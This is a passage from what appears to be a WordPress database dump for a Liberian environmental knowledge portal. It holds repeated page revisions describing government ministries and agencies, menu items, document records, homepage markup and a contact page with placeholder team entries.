terms of surveying, drafting/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.</p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.</p>		\n			<h2>Featured Projects</h2>		\n		Coming up		\n			<h2>Related Documents</h2>','Ministry of Public Works','','inherit','closed','closed','','1594-revision-v1','','','2019-11-15 09:21:19','2019-11-15 09:21:19','',1594,'https://ekmsliberia.info/1594-revision-v1/',0,'revision','',0),(2260,1,'2019-11-15 09:24:30','2019-11-15 09:24:30','<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.</p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.</p>		\n			<h2>Featured Projects</h2>		\n		Coming up		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:moa\" page_length=\"false\"]','Ministry of Public Works','','inherit','closed','closed','','1594-revision-v1','','','2019-11-15 09:24:30','2019-11-15 09:24:30','',1594,'https://ekmsliberia.info/1594-revision-v1/',0,'revision','',0),(2261,1,'2019-11-15 09:25:27','2019-11-15 09:25:27','<p>The Ministry of Agriculture (MOA) works to create an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.</p><p>In addition, MOA ensures that agricultural challenges that impede production are investigated and lasting solutions found, and the farmers are provided with the supportive services and the enabling environment to produce.</p><p>The core general areas of responsibility of MOA will likely continue to consist of: agriculture, both smallholder and commercial; plantation crops; fisheries; and livestock.</p><h4>Mandate</h4><p>The Ministry\'s mandate is to develop the agriculture sector in collaboration with other relevant institutions in Liberia.</p>		\n			<h2>Featured Projects</h2>		\n		Coming up		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:moa\" page_length=\"false\"]','Ministry of Agriculture','','inherit','closed','closed','','1600-revision-v1','','','2019-11-15 09:25:27','2019-11-15 09:25:27','',1600,'https://ekmsliberia.info/1600-revision-v1/',0,'revision','',0),(2262,1,'2019-11-15 09:26:16','2019-11-15 09:26:16','The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.\r\n\r\nThe Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.\r\n<h2>Featured Projects</h2>\r\nComing up\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:moa\" page_length=\"false\"]','Ministry of Public Works','','inherit','closed','closed','','1594-revision-v1','','','2019-11-15 09:26:16','2019-11-15 09:26:16','',1594,'https://ekmsliberia.info/1594-revision-v1/',0,'revision','',0),(2263,1,'2019-11-15 09:26:45','2019-11-15 09:26:45','<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.</p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.</p>		\n			<h2>Featured Projects</h2>		\n		Coming up		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mpw\" page_length=\"false\"]','Ministry of Public Works','','inherit','closed','closed','','1594-revision-v1','','','2019-11-15 09:26:45','2019-11-15 09:26:45','',1594,'https://ekmsliberia.info/1594-revision-v1/',0,'revision','',0),(2264,1,'2019-11-15 09:31:00','2019-11-15 09:31:00','The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\nThe overall fisheries sector goal is: Sustainably managed and economically viable\nfisheries that generate prosperity for the present and generations yet unborn.		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','National Fisheries & Aquaculture Authority','','inherit','closed','closed','','1588-revision-v1','','','2019-11-15 09:31:00','2019-11-15 09:31:00','',1588,'https://ekmsliberia.info/1588-revision-v1/',0,'revision','',0),(2265,1,'2019-11-15 09:31:29','2019-11-15 09:31:29','The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\nThe overall fisheries sector goal is: Sustainably managed and economically viable\nfisheries that generate prosperity for the present and generations yet unborn.		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>','National Fisheries & Aquaculture Authority','','inherit','closed','closed','','1588-revision-v1','','','2019-11-15 09:31:29','2019-11-15 09:31:29','',1588,'https://ekmsliberia.info/1588-revision-v1/',0,'revision','',0),(2266,1,'2019-11-15 09:32:40','2019-11-15 09:32:40','The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\nThe overall fisheries sector goal is: Sustainably managed and economically viable\nfisheries that generate prosperity for the present and generations yet unborn.		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mpw\" page_length=\"false\"]','National Fisheries & Aquaculture Authority','','inherit','closed','closed','','1588-revision-v1','','','2019-11-15 09:32:40','2019-11-15 09:32:40','',1588,'https://ekmsliberia.info/1588-revision-v1/',0,'revision','',0),(2267,1,'2019-11-15 09:33:00','2019-11-15 09:33:00','The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\nThe overall fisheries sector goal is: Sustainably managed and economically viable\nfisheries that generate prosperity for the present and generations yet unborn.		\n			<h2>Featured Projects</h2>		\n		Coming up		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mpw\" page_length=\"false\"]','National Fisheries & Aquaculture Authority','','inherit','closed','closed','','1588-revision-v1','','','2019-11-15 09:33:00','2019-11-15 09:33:00','',1588,'https://ekmsliberia.info/1588-revision-v1/',0,'revision','',0),(2268,1,'2019-11-15 09:33:21','2019-11-15 09:33:21','The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\nThe overall fisheries sector goal is: Sustainably managed and economically viable\nfisheries that generate prosperity for the present and generations yet unborn.		\n			<h2>Featured Projects</h2>		\n		Coming up		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mpw\" page_length=\"false\"]','National Fisheries & Aquaculture Authority','','inherit','closed','closed','','1588-revision-v1','','','2019-11-15 09:33:21','2019-11-15 09:33:21','',1588,'https://ekmsliberia.info/1588-revision-v1/',0,'revision','',0),(2269,1,'2019-11-15 09:33:30','2019-11-15 09:33:30','The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\r\nThe overall fisheries sector goal is: Sustainably managed and economically viable\r\nfisheries that generate prosperity for the present and generations yet unborn.\r\n<h2>Featured Projects</h2>\r\nComing up\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mpw\" page_length=\"false\"]','National Fisheries & Aquaculture Authority','','inherit','closed','closed','','1588-revision-v1','','','2019-11-15 09:33:30','2019-11-15 09:33:30','',1588,'https://ekmsliberia.info/1588-revision-v1/',0,'revision','',0),(2270,1,'2019-11-15 09:35:08','2019-11-15 09:35:08','The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\nThe overall fisheries sector goal is: Sustainably managed and economically viable\nfisheries that generate prosperity for the present and generations yet unborn.		\n			<h2>Featured Projects</h2>		\n		Coming up		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:nafaa\" page_length=\"false\"]','National Fisheries & Aquaculture Authority','','inherit','closed','closed','','1588-revision-v1','','','2019-11-15 09:35:08','2019-11-15 09:35:08','',1588,'https://ekmsliberia.info/1588-revision-v1/',0,'revision','',0),(2271,1,'2019-11-15 09:39:44','2019-11-15 09:39:44','<p>The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.</p>\n<p>The overall fisheries sector goal is: Sustainably managed and economically viable fisheries that generate prosperity for the present and generations yet unborn.</p>		\n			<h2>Featured Projects</h2>		\n		Coming up		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:nafaa\" page_length=\"false\"]','National Fisheries & Aquaculture Authority','','inherit','closed','closed','','1588-revision-v1','','','2019-11-15 09:39:44','2019-11-15 09:39:44','',1588,'https://ekmsliberia.info/1588-revision-v1/',0,'revision','',0),(2272,1,'2019-11-15 09:41:25','2019-11-15 09:41:25','<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.</p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 – 2015) program that was signed in 2010.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mme\" page_length=\"false\"]','Ministry of Mines and Energy','','inherit','closed','closed','','1608-revision-v1','','','2019-11-15 09:41:25','2019-11-15 09:41:25','',1608,'https://ekmsliberia.info/1608-revision-v1/',0,'revision','',0),(2273,1,'2019-11-15 09:42:12','2019-11-15 09:42:12','<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.</p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 – 2015) program that was signed in 2010.</p>		\n			<h2>Featured Projects</h2>		\n		Coming up		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mme\" page_length=\"false\"]','Ministry of Mines and Energy','','inherit','closed','closed','','1608-revision-v1','','','2019-11-15 09:42:12','2019-11-15 09:42:12','',1608,'https://ekmsliberia.info/1608-revision-v1/',0,'revision','',0),(2274,1,'2019-11-15 09:55:51','2019-11-15 09:55:51','','MME Official Site','','publish','closed','closed','','mme-official-site','','','2019-11-20 11:34:57','2019-11-20 11:34:57','',0,'https://ekmsliberia.info/?p=2274',1,'nav_menu_item','',0),(2275,1,'2019-11-15 09:55:51','2019-11-15 09:55:51','','License Application Process','','publish','closed','closed','','license-application-process','','','2019-11-20 11:34:57','2019-11-20 11:34:57','',0,'https://ekmsliberia.info/?p=2275',2,'nav_menu_item','',0),(2277,1,'2019-11-15 09:51:13','2019-11-15 09:51:13','The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.\r\n\r\nThe Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 – 2015) program that was signed in 2010.\r\n<h2>Featured Projects</h2>\r\nComing up\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mme\" page_length=\"false\"]','Ministry of Mines and Energy','','inherit','closed','closed','','1608-revision-v1','','','2019-11-15 09:51:13','2019-11-15 09:51:13','',1608,'https://ekmsliberia.info/1608-revision-v1/',0,'revision','',0),(2278,1,'2019-11-15 10:05:46','2019-11-15 10:05:46','','MME Sidebar','','publish','closed','closed','','mme-sidebar','','','2019-11-20 11:50:00','2019-11-20 11:50:00','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2278',0,'sidebar','',0),(2279,1,'2019-11-15 09:59:26','2019-11-15 09:59:26','','','','publish','closed','closed','','2279','','','2019-11-15 09:59:38','2019-11-15 09:59:38','',2278,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2279',1,'condition_group','',0),(2280,1,'2019-11-15 10:06:59','2019-11-15 10:06:59','','LLA Sidebar','','publish','closed','closed','','lla-sidebar','','','2019-11-15 10:09:05','2019-11-15 10:09:05','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2280',0,'sidebar','',0),(2281,1,'2019-11-15 10:06:27','2019-11-15 10:06:27','','','','publish','closed','closed','','2281','','','2019-11-15 10:06:52','2019-11-15 10:06:52','',2280,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2281',1,'condition_group','',0),(2282,1,'2019-11-15 10:10:37','2019-11-15 10:10:37','','laa_logo','','inherit','open','closed','','laa_logo','','','2021-08-17 23:34:02','2021-08-17 23:34:02','',1596,'https://ekmsliberia.info/wp-content/uploads/2019/11/laa_logo.png',0,'attachment','image/png',0),(2284,1,'2019-11-15 10:13:53','2019-11-15 10:13:53','','LLA Official Site','','publish','closed','closed','','lla-official-site','','','2019-11-15 10:30:46','2019-11-15 10:30:46','',0,'https://ekmsliberia.info/?p=2284',1,'nav_menu_item','',0),(2285,1,'2019-11-15 10:34:26','2019-11-15 10:34:26','','NaFAA Official Site','','publish','closed','closed','','nafaa-official-site','','','2019-11-15 10:34:26','2019-11-15 10:34:26','',0,'https://ekmsliberia.info/?p=2285',1,'nav_menu_item','',0),(2286,1,'2019-11-15 10:34:26','2019-11-15 10:34:26','','Vessel Registry','','publish','closed','closed','','vessel-registry','','','2019-11-15 10:34:26','2019-11-15 10:34:26','',0,'https://ekmsliberia.info/?p=2286',2,'nav_menu_item','',0),(2288,1,'2019-11-15 10:42:27','2019-11-15 10:42:27','<p>The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.</p><p>\nThe LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia. LLA is a product of the policy, legal and institutional reform of the land sector of Liberia led by the erstwhile Land Commission.</p>','Liberia Land Authority','','inherit','closed','closed','','1602-revision-v1','','','2019-11-15 10:42:27','2019-11-15 10:42:27','',1602,'https://ekmsliberia.info/1602-revision-v1/',0,'revision','',0),(2289,1,'2019-11-15 10:43:17','2019-11-15 10:43:17','<p>The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.</p><p>The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia. </p>','Liberia Land Authority','','inherit','closed','closed','','1602-revision-v1','','','2019-11-15 10:43:17','2019-11-15 10:43:17','',1602,'https://ekmsliberia.info/1602-revision-v1/',0,'revision','',0),(2290,1,'2019-11-15 10:46:28','2019-11-15 10:46:28','<p>The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.</p><p>The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia. </p>		\n			<h2>Featured Projects</h2>		\n		Coming up		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:lla\" page_length=\"false\"]','Liberia Land Authority','','inherit','closed','closed','','1602-revision-v1','','','2019-11-15 10:46:28','2019-11-15 10:46:28','',1602,'https://ekmsliberia.info/1602-revision-v1/',0,'revision','',0),(2291,1,'2019-11-15 11:22:37','2019-11-15 11:22:37','','LISGIS Official Site','','publish','closed','closed','','lisgis-official-site','','','2019-11-15 11:36:10','2019-11-15 11:36:10','',0,'https://ekmsliberia.info/?p=2291',1,'nav_menu_item','',0),(2292,1,'2019-11-15 11:22:37','2019-11-15 11:22:37','','Data Dissemination Tools','','publish','closed','closed','','data-dissemination-tools','','','2019-11-15 11:36:10','2019-11-15 11:36:10','',0,'https://ekmsliberia.info/?p=2292',2,'nav_menu_item','',0),(2293,1,'2019-11-15 11:41:43','2019-11-15 11:41:43','News and Stories highlighting the work of the Environmental Protection Agency (EPA) over the period in Liberia','EPA Newsletter December 2018 Edition','','publish','closed','closed','','epa-newsletter-december-2018-edition','','','2022-12-06 10:57:37','2022-12-06 10:57:37','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2293',134,'document','',0),(2294,1,'2019-11-15 11:40:35','2019-11-15 11:40:35','','EPA Newsletter December 2018 Edition','','inherit','open','closed','','epa-newsletter-december-2018-edition','','','2019-11-15 11:40:35','2019-11-15 11:40:35','',2293,'https://ekmsliberia.info/wp-content/uploads/2019/11/EPA-Newsletter-December-2018-Edition.pdf',0,'attachment','application/pdf',0),(2295,1,'2019-11-15 11:40:54','2019-11-15 11:40:54','','EPA Newsletter April 2019 Edition','','inherit','open','closed','','epa-newsletter-april-2019-edition','','','2019-11-15 11:40:54','2019-11-15 11:40:54','',2293,'https://ekmsliberia.info/wp-content/uploads/2019/11/EPA-Newsletter-April-2019-Edition.pdf',0,'attachment','application/pdf',0),(2296,1,'2019-11-15 11:42:35','2019-11-15 11:42:35','News and Stories highlighting the work of the Environmental Protection Agency (EPA) over the period in Liberia','EPA Newsletter April 2019 Edition','','publish','closed','closed','','epa-newsletter-april-2019-edition','','','2022-12-06 10:57:17','2022-12-06 10:57:17','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2296',133,'document','',0),(2297,1,'2019-11-15 11:48:01','2019-11-15 11:48:01','The individual ownership of land in Liberia has long been recognized and all such ownership stems from grants of land made to individuals and purchases from local people. Dealings in private lands are regulated by law and are recorded in a Deeds Registry. By the 1960s the\r\nstatus of information in the registries was so uncertain that in 1971 the government asked UNDP to provide assistance to undertake a pilot Cadastral Survey in Monrovia with the hopes to establishing an Office of Land Register to cure the defects of the existing system of\r\ndeeds registration. Following the enactment of the land registration law in 1974 (Chapter 8 of the Property Law) the government of Liberia began to implement a pilot systematic land title registration program. This activity ceased shortly after the coup in 1980.\r\n\r\nThe current situation in the deeds registry has not improved from the late 1970’s and in fact has probably gotten much worse to the point that there is currently a total lack of trust with the system. Many records were destroyed during the years of turmoil. Many transactions\r\nhave occurred with little reference to existing documents or previous transactions, leading to a situation of parcels being subdivided and sold with no accompanying adjustment to the mother deed. Many fraudulent documents have entered the system with little ability to correct the information prior to its being entered in the register. The overall result of this situation is that there exist seemingly valid yet conflicting documents, as well as many fraudulent documents registered with land-related Government institutions. As people are dissatisfied with the existing deed registration system, there is growing pressure to replace the existing system with an alternative title registration system.','Title Registration Report','','publish','closed','closed','','title-registration-report','','','2021-08-23 10:43:00','2021-08-23 10:43:00','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2297',118,'document','',0),(2298,1,'2019-11-15 11:46:18','2019-11-15 11:46:18','','Title_Registration_Report_Last','','inherit','open','closed','','title_registration_report_last','','','2019-11-15 11:46:18','2019-11-15 11:46:18','',2297,'https://ekmsliberia.info/wp-content/uploads/2019/11/Title_Registration_Report_Last.pdf',0,'attachment','application/pdf',0),(2299,1,'2019-11-15 12:15:50','2019-11-15 12:15:50','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_type&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"70\">Documents</option>\n	<option value=\"116\">Government</option>\n	<option value=\"117\">International</option>\n	<option value=\"73\">Topics</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"featured_marine\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-15 12:15:50','2019-11-15 12:15:50','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2305,1,'2019-11-15 12:42:32','2019-11-15 12:42:32','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-13.jpg\" alt=\"team-13.jpg\" ></figure>		\n		<h3>John Borthwick</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-14.jpg\" alt=\"team-14.jpg\" ></figure>		\n		<h3>Mary Scott</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-15.jpg\" alt=\"team-15.jpg\" ></figure>		\n		<h3>David Anderson</h3>Founder & CEO<p>Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.</p>\n			<figure><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/team-16.jpg\" alt=\"team-16.jpg\" 